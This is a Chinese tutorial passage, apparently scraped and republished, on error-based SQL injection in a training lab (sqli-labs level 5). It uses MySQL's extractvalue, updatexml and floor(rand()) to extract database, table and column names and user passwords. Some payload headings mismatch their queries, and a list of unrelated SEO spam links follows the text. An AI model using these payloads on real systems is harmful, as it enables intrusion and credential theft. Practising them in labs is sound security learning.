当前位置: 首页 > wzjs >正文

soho设计网站百度推广渠道代理

wzjs 2025/7/29 16:27:39
soho设计网站,百度推广渠道代理,黄骅港船舶动态,高端网购app上次写了第五关的布尔盲注,和双查询报错注入,还有其他报错注入的方法 一.extractvalue函数 extractvalue函数 原理 extractvalue 是一个在 XML 数据中提取值的 MySQL 内置函数。它的语法为: EXTRACTVALUE(xml, xpath_expr)xml 是 XML 字符…

上次写了第五关的布尔盲注,和双查询报错注入,还有其他报错注入的方法

一.extractvalue函数

extractvalue函数

原理

extractvalue 是一个在 XML 数据中提取值的 MySQL 内置函数。它的语法为:
EXTRACTVALUE(xml, xpath_expr)xml 是 XML 字符串,xpath_expr 是 XPath 表达式,该函数会从 xml 参数中提取与 XPath 表达式匹配的节点值,并返回结果。如果找不到匹配的节点,则返回空字符串,如果 XPath 表达式匹配了多个节点,则只返回第一个匹配的节点的值。

eg假设有这个XML 数据:

<book><title>MySQL Database Design and Tuning</title><author>Robert D Schneider</author><year>2005</year>
</book>

用 extractvalue 函数提取 title 节点的值:

SELECT EXTRACTVALUE('<book><title>MySQL Database Design and Tuning</title><author>Robert D Schneider</author><year>2005</year></book>', '//title');

执行结果:

MySQL Database Design and Tuning

实例

查库名

1' and extractvalue(1,concat(1,database())) %23

 '1' 表示在输入参数中添加一个条件,该条件与其他条件相互独立,用于生成一个新的查询结果。AND 连接符用于将新的条件与原有查询语句进行逻辑上的连接。extractvalue(1,concat(1,database())) 表示从 XML 数据中提取值,其中第一个参数为 1,表示要查询的 XML 数据,在这里没有实际作用;第二个参数为 concat(1,database()),表示将数字 1 和当前数据库名称拼接成一个字符串,然后使用 extractvalue 函数从该字符串中提取值,并将其添加到查询结果中。如果数据库名称不为空,则返回该名称,否则返回空字符串。回显库名security下图

 

查表名

1' union select 1,2, (updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),1)) %23

查列名

1' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security'))) %23

查字段

1' and extractvalue(1,concat(1,(select concat((select group_concat(username) from users), '~', (select group_concat(password) from users)) ) )) %23

由于extractvalue函数只能查询32位长度,导致结果缺失,改用limit查询

1' and extractvalue(1,concat(1,(select concat((select username from users limit 0,1), '~', (select password from users limit 0,1)) ) )) %23

 改一下0,1改成1,1 / 2,1/

 

 

 嘻嘻好像没啥用

updatexml函数

原理

updatexml 函数是 MySQL 数据库中用于修改 XML 格式数据的一个内置函数,语法如下

xml_target 表示要进行修改的 XML 数据;xpath_expr 表示要修改的节点路径;new_val 表示要修改成的新值。updatexml 函数的工作原理是将指定的 XML 数据解析为 DOM(文档对象模型) 文档树,并根据 xpath 表达式找到对应的节点,然后将该节点的内容替换为新值。如果节点不存在,则不进行任何操作。

实例

查库名

1' union select 1,2, (updatexml(1,concat(1,database()),1)) %23

UNION SELECT 1,2,(updatexml(1,concat(1,database()),1)) 表示使用 UNION 运算符将两个查询结果合并起来,同时将 updatexml 函数的结果添加到第二个 SELECT 查询中。

updatexml 函数用于修改 XML 数据中的内容,其中第一个参数为 1,表示要修改的 XML 数据,在这里没有实际作用;第二个参数为 concat(1,database()),表示将数字 1 和当前数据库名称拼接成一个字符串作为修改内容;第三个参数为 1,表示将修改后的结果写入 XML 数据中。

 

查表名

1' union select 1, count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) a from information_schema.tables group by a  %23

查列名

1' union select 1, count(*), concat((select concat(username,':',password) from users  limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a  %23

查字段

1' union select 1,2, (updatexml(1,concat(1,(select username from users limit 0, 1),1,(select password from users limit 0,1)),1)) %23

http://www.dtcms.com/wzjs/140937.html

相关文章:

  • 丰台深圳网站建设公司百度站长工具使用方法
  • 北京建站模板企业福州关键词快速排名
  • 开发软件下载莆田关键词优化报价
  • 做竞赛的平台或网站百度地图排名怎么优化
  • 网站设计是怎么做的搜索引擎优化与关键词的关系
  • 甘肃建设厅官方网站项目负责人软文营销是什么
  • 手机验证登录网站开发网页模版
  • 电商网站开发平台需要多少域名地址查询
  • 做网站html艾滋病多长时间能查出来
  • 网站编辑工作内容怎么写百度账号购买网站
  • 配置wordpress七牛seo技术培训宁波
  • 网站做的不好使站长工具seo综合查询怎么关闭
  • jsp网站开发论文2017seo如何优化关键词排名
  • 网站通栏是什么河南疫情最新情况
  • 昆明哪些做网站建设的公司优化大师哪个好
  • 网站推广策略都有哪些软文文章
  • 建站基础百度助手
  • 网站页面html静态化是什么意思网络推广平台都有哪些
  • 网站开发备案费用百度推广天津总代理
  • 网站源码采集seo服务外包公司
  • 可以做兼职的网站有哪些工作室开发做一个网站需要多少钱
  • 支付网站备案百度广告位价格表
  • 网站类型有哪些惠州百度seo在哪
  • 网站建设橙子淄博seo推广
  • 建设网站的行业现状性能优化大师
  • 网站建设最好的网站建设平台哪家好
  • 党建联盟网站建设通知seo关键词是什么
  • 兰州做高端网站的公司整站优化方案
  • 微信小程序联盟网站培训心得简短50字
  • 资源分享类网站模板做网站建网站公司